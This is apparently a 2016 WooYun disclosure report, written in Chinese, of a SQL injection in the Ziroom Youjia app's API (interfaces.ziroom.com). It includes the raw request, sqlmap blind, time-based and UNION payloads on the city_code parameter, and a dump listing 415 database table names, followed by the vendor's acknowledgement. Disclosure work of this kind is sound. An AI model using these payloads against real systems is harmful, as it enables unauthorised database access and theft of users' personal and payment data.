漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
									2016-04-22:	细节已通知厂商并且等待厂商处理中
									2016-04-22:	厂商已经确认,细节仅向厂商公开
									2016-05-02:	细节向核心白帽子及相关领域专家公开
									2016-05-12:	细节向普通白帽子公开
									2016-05-22:	细节向实习白帽子公开
									2016-06-06:	细节向公众公开
								
简要描述:
自如友家APP sql注射漏洞涉及415个表198万多数据
详细说明:
链接及参数:
POST /index.php?_p=api_mobile&_a=get_hotSearchWords HTTP/1.1
Content-Length: 190
Content-Type: application/x-www-form-urlencoded
Host: interfaces.ziroom.com
Connection: close
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.100.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b×tamp=1461314033&city_code=110000&app=v3.3.1&os=android%3A5.1&model=8681-A01 
漏洞证明:
[*] starting at 16:55:01
[16:55:01] [INFO] parsing HTTP request from 'yy.txt'
[16:55:02] [INFO] resuming back-end DBMS 'mysql' 
[16:55:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: city_code (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b×tamp=1461314033&city_code=110000 AND 1153=1153&app=v3.3.1&os=android:5.1&model=8681-A01
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b×tamp=1461314033&city_code=110000 AND (SELECT * FROM (SELECT(SLEEP(5)))yfFI)&app=v3.3.1&os=android:5.1&model=8681-A01
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b×tamp=1461314033&city_code=110000 UNION ALL SELECT CONCAT(0x7170707071,0x57724b52437841506852734e69546e4a4b567079686d587a6b625754486470416377694a7a655373,0x71766b7171)-- sKhk&app=v3.3.1&os=android:5.1&model=8681-A01
---
[16:55:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.22
back-end DBMS: MySQL 5.0.12
[16:55:02] [INFO] fetching tables for database: 'newziroom'
[16:55:02] [INFO] the SQL query used returns 415 entries
Database: newziroom
[415 tables]
+--------------------------------------+
| user                                 |
| active_sz_yushouka                   |
| activity_wx_plus_2                   |
| api_house_shelf_apply                |
| api_house_shelf_following            |
| api_house_shelf_reason               |
| cash                                 |
| cash_tmp                             |
| cms_activity_manage                  |
| cms_huilei_apply                     |
| cms_huilei_house                     |
| cms_serverinfo_manage                |
| collection                           |
| complain                             |
| complain_content                     |
| log_crm_request                      |
| m_look_push                          |
| m_msg_guanjia                        |
| m_msg_jpush                          |
| m_msg_ziroomer                       |
| m_newsign_order_jdloan_refund_log    |
| m_newsign_orders_log                 |
| m_payment_callback_log               |
| m_user_count_log                     |
| m_will_about_user_detail             |
| m_zwp_appointment_look               |
| member_list                          |
| operation_log                        |
| pay_cron_list                        |
| pay_order                            |
| pay_order_success                    |
| pay_terraceorder_success             |
| payment_order                        |
| payment_order_callback_log           |
| shhsh_recommended_user_info          |
| shhsh_ziroomer_info                  |
| steward                              |
| sz_seed_plan                         |
| sz_seed_plan_pic                     |
| sz_seed_plan_question                |
| szhsh_recommended_user_info          |
| szhsh_ziroomer_info                  |
| t_400_day_detail                     |
| t_account_log                        |
| t_active_base                        |
| t_admin_auth                         |
| t_ams_book_api                       |
| t_appointment                        |
| t_area                               |
| t_arrange                            |
| t_award                              |
| t_award_getting                      |
| t_award_hd                           |
| t_award_list                         |
| t_award_movie                        |
| t_awardlist                          |
| t_awardlist_bak                      |
| t_baojie_decode_action               |
| t_baojie_pay_centre_action           |
| t_baojie_pay_click_action            |
| t_base                               |
| t_bills                              |
| t_blacklist                          |
| t_blind_base                         |
| t_blind_vote                         |
| t_bookonline_customer                |
| t_business                           |
| t_business_bak                       |
| t_cards_log                          |
| t_chest_points                       |
| t_chest_vote                         |
| t_city                               |
| t_citys                              |
| t_cms_account_log                    |
| t_cms_activityApp                    |
| t_cms_activityApp_body               |
| t_cms_activityApp_detail             |
| t_cms_ad                             |
| t_cms_ad_index                       |
| t_cms_ad_index_pic                   |
| t_cms_ad_keywords                    |
| t_cms_ad_new                         |
| t_cms_ad_new_pic                     |
| t_cms_ad_room                        |
| t_cms_ad_room_category               |
| t_cms_ad_room_phone                  |
| t_cms_administrator                  |
| t_cms_app_version                    |
| t_cms_cdotp_activity                 |
| t_cms_change_log                     |
| t_cms_customer_message               |
| t_cms_faq                            |
| t_cms_faq_list                       |
| t_cms_friend_message                 |
| t_cms_gift_init                      |
| t_cms_html                           |
| t_cms_links                          |
| t_cms_links_modules                  |
| t_cms_links_type                     |
| t_cms_m_keywords                     |
| t_cms_m_room                         |
| t_cms_m_room_category                |
| t_cms_message_log                    |
| t_cms_newsblogs_list                 |
| t_cms_newsblogs_list_01              |
| t_cms_newsblogs_type                 |
| t_cms_newsblogs_type_01              |
| t_cms_newyear                        |
| t_cms_part                           |
| t_cms_part_search                    |
| t_cms_part_search_copy               |
| t_cms_project                        |
| t_cms_qa                             |
| t_cms_qa_type                        |
| t_cms_sales_manage                   |
| t_cms_same_city                      |
| t_cms_service_answer                 |
| t_cms_service_guide                  |
| t_cms_service_question               |
| t_cms_service_star                   |
| t_cms_subwayadvers                   |
| t_cms_svr_tool                       |
| t_cms_sys_message                    |
| t_cms_tax                            |
| t_cms_up_project                     |
| t_cms_user                           |
| t_cms_user1                          |
| t_cms_user20150816                   |
| t_cms_user20160125                   |
| t_cms_user_0125XU                    |
| t_cms_user_20160125bak               |
| t_cms_user_copy                      |
| t_cms_user_old                       |
| t_cms_user_zx0126                    |
| t_cms_vanke_activity                 |
| t_cms_warmprompt                     |
| t_cms_xiaoqu_feature                 |
| t_cms_xiaoqu_feature_photo           |
| t_cms_year_order                     |
| t_cms_ziroom_announcement            |
| t_cms_ziroomer_category              |
| t_cms_ziroomer_cheer                 |
| t_cms_ziroomer_commendatory_letter   |
| t_cms_ziroomer_index                 |
| t_cms_ziroomer_shop                  |
| t_cms_ziroommanager                  |
| t_cms_ziruyu_story                   |
| t_common_account                     |
| t_common_actual_account              |
| t_community_around                   |
| t_complain                           |
| t_contract                           |
| t_contract_book                      |
| t_contract_book_payVoucher           |
| t_contract_cards                     |
| t_contract_chest                     |
| t_contract_direct                    |
| t_contract_direct_active_log         |
| t_contract_direct_activities         |
| t_contract_direct_activities_bak     |
| t_contract_direct_activities_log     |
| t_contract_direct_api_log            |
| t_contract_direct_api_log_old        |
| t_contract_direct_cust               |
| t_contract_direct_payVoucher         |
| t_contract_direct_promotion          |
| t_contract_direct_property1          |
| t_contract_direct_property2          |
| t_contract_direct_property3          |
| t_contract_direct_receipt            |
| t_contract_direct_renter             |
| t_contract_direct_renter_log         |
| t_contract_direct_step_log           |
| t_contract_direct_substep            |
| t_contract_direct_upcust_log         |
| t_contract_insert                    |
| t_contract_insert_api_log            |
| t_contract_insert_receipt            |
| t_contract_jingdong                  |
| t_contract_log                       |
| t_contract_online                    |
| t_contract_receipt_retry_list        |
| t_contract_renew                     |
| t_contract_reservation               |
| t_contract_reservation_active_log    |
| t_contract_reservation_comment       |
| t_contract_reservation_customer      |
| t_contract_reservation_customer_log  |
| t_contract_reservation_customer_mlog |
| t_contract_reservation_house         |
| t_contract_reservation_pay_list      |
| t_contract_reservation_pay_log       |
| t_contract_reservation_refund        |
| t_contract_ziruyu_contract_complete  |
| t_contract_ziruyu_error              |
| t_contract_ziruyu_pay_callback       |
| t_contract_ziruyu_pay_complete       |
| t_contract_ziruyu_pay_url_log        |
| t_contract_ziruyu_sync_log           |
| t_coupon_card                        |
| t_coupon_card_160203                 |
| t_coupon_card_bak                    |
| t_crm_book_look                      |
| t_crm_book_look_msg                  |
| t_crm_contract_house_belonger        |
| t_crm_customer                       |
| t_crm_customer_msg                   |
| t_crm_data_report                    |
| t_crm_direct                         |
| t_crm_following                      |
| t_crm_lease                          |
| t_crm_lease_con                      |
| t_crm_lease_operate                  |
| t_crm_lookhouse                      |
| t_crm_lookhouse_msg                  |
| t_crm_lookhouse_wi                   |
| t_crm_notify                         |
| t_crm_relation                       |
| t_crm_relation_item                  |
| t_crm_relation_new                   |
| t_crm_reservation                    |
| t_crm_work_all                       |
| t_crm_work_log                       |
| t_customer                           |
| t_customer_rating                    |
| t_cycle                              |
| t_cycle_face                         |
| t_dakehu_comment                     |
| t_dakehu_groupCustomers              |
| t_dakehu_new                         |
| t_dakehu_notice                      |
| t_dakehu_teamwork                    |
| t_dakehu_teamwork_content            |
| t_dict                               |
| t_dict_school                        |
| t_district                           |
| t_district_bak                       |
| t_district_business                  |
| t_district_business_bak              |
| t_dspeak                             |
| t_duanzu_apply                       |
| t_duanzu_rss                         |
| t_ehr_dept                           |
| t_ehr_dept_log                       |
| t_ehr_job                            |
| t_ehr_job_log                        |
| t_ehr_person                         |
| t_ehr_person_log                     |
| t_exist_pic_house                    |
| t_feedback                           |
| t_function                           |
| t_general_consumption_api_log        |
| t_general_consumption_customer       |
| t_general_consumption_detail         |
| t_general_consumption_operation_log  |
| t_general_consumption_status         |
| t_general_consumption_temp           |
| t_general_consumption_type           |
| t_general_receipt_detail             |
| t_general_receipt_stand_num          |
| t_gift                               |
| t_gift_bak                           |
| t_gift_bat                           |
| t_gift_by_user                       |
| t_gift_by_user_s                     |
| t_gift_cms_admin                     |
| t_gift_gj                            |
| t_gift_gj_s                          |
| t_guest                              |
| t_haiyan_tour                        |
| t_house                              |
| t_house_room_lock                    |
| t_index_ziroomer                     |
| t_index_ziroomer_wb                  |
| t_integral_add_log                   |
| t_intention_house_info               |
| t_ios_channel                        |
| t_ios_msg                            |
| t_keyword                            |
| t_log                                |
| t_login_log                          |
| t_loginlog                           |
| t_map_building                       |
| t_map_content                        |
| t_map_suggestion                     |
| t_map_type                           |
| t_memecache_queue_log                |
| t_menu                               |
| t_move_house                         |
| t_order_log                          |
| t_order_pay_log                      |
| t_pay                                |
| t_pay_account                        |
| t_pay_account_relet                  |
| t_pay_actual_account                 |
| t_pay_actual_account_relet           |
| t_pay_plan                           |
| t_pay_plan_direct                    |
| t_pay_plan_online                    |
| t_pay_plan_renew                     |
| t_payment_log                        |
| t_payment_receipt                    |
| t_penalty_change_log                 |
| t_penalty_plan                       |
| t_permission                         |
| t_permission_group                   |
| t_profile                            |
| t_project_images                     |
| t_province                           |
| t_quality_rating                     |
| t_question                           |
| t_questionnaire                      |
| t_rebate                             |
| t_recruit                            |
| t_recruit_detail                     |
| t_referee                            |
| t_referee_card                       |
| t_referee_card_send_record           |
| t_referee_question_answer            |
| t_relation_recruit                   |
| t_renew_apply                        |
| t_renew_expire                       |
| t_repair                             |
| t_role                               |
| t_room                               |
| t_room_pictures_new                  |
| t_room_promotion                     |
| t_room_promotion_type                |
| t_seekziroomer_base                  |
| t_seekziroomer_vote                  |
| t_sellcontrol_log                    |
| t_service_common_question_keyword    |
| t_soap_bind_phone                    |
| t_soap_bind_phone20160125            |
| t_soap_bind_phone20160125bak         |
| t_soap_bind_phone_0125XU             |
| t_soap_bind_phone_160315             |
| t_soap_bind_phone_160412             |
| t_soap_bind_phone_bak20150814        |
| t_soap_bind_phone_zx0126             |
| t_sowing                             |
| t_special                            |
| t_steward_business                   |
| t_steward_business_20150505          |
| t_sub_station                        |
| t_subway                             |
| t_subway_station                     |
| t_subway_station_bak                 |
| t_suding_house                       |
| t_suding_order                       |
| t_suding_pay_log                     |
| t_suding_refund_log                  |
| t_suding_reservation                 |
| t_suding_term                        |
| t_suding_yuyue                       |
| t_summer                             |
| t_temp_contract_activity             |
| t_temp_jd_activity_lottery           |
| t_temp_jd_activity_winner_list       |
| t_ticket                             |
| t_trends                             |
| t_update_login                       |
| t_user                               |
| t_user_appointment                   |
| t_user_date                          |
| t_web_navigation                     |
| t_www_ziruyu_yuyue                   |
| t_zhuanti_color_life                 |
| t_ziroomlife_activity                |
| t_ziroomlife_bulletin                |
| t_ziroomlife_businessinfo            |
| t_ziroomlife_neighborreminder        |
| t_ziroomlife_news                    |
| t_ziroomlife_vote                    |
| t_ziruyu_activity                    |
| t_ziruyu_winner                      |
| t_ziruyu_yuyue                       |
| t_zrsd_log                           |
| temp_table1                          |
| test                                 |
| tmp                                  |
| tmp_newziroom_xiazhi                 |
| tmp_xiazhi                           |
| u_general_receipt_callback_log       |
| u_general_receipt_order              |
| u_general_receipt_order_callback     |
| u_general_receipt_to_crm_error       |
| u_general_receipt_to_crm_log         |
| unfirst_pay_internal_consu           |
| unfirst_pay_notify_log               |
| unfirst_pay_order                    |
| unfirst_pay_post_log                 |
| unfirst_pay_return_log               |
| v_room                               |
| v_roomandcustomer                    |
| wx_activity                          |
| wx_credit_record                     |
| wx_credit_total                      |
| wx_move_code                         |
| wx_user                              |
| ziroom_flat                          |
| ziroom_simple_life                   |
| zrlife                               |
| zsl_activity_info                    |
| zsl_pic_address                      |
| zsl_vote_info                        |
| zsl_ziroomer_info                    |
| zwp_archives_evaluation              |
| zwp_archives_surrounding             |
| zwp_groups                           |
| zwp_nums                             |
| zwp_permission                       |
| zwp_permission_relation              |
| zwp_user_group_relation              |
| zwp_user_group_relation_copy         |
+--------------------------------------+
[16:55:02] [INFO] fetched data logged to text files under 
 
修复方案:
参数过滤!
版权声明:转载请注明来源 路人甲@乌云
>
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2016-04-22 21:24
厂商回复:
老代码问题,感谢提醒正在处理!
最新状态:
暂无

 
                 
                        
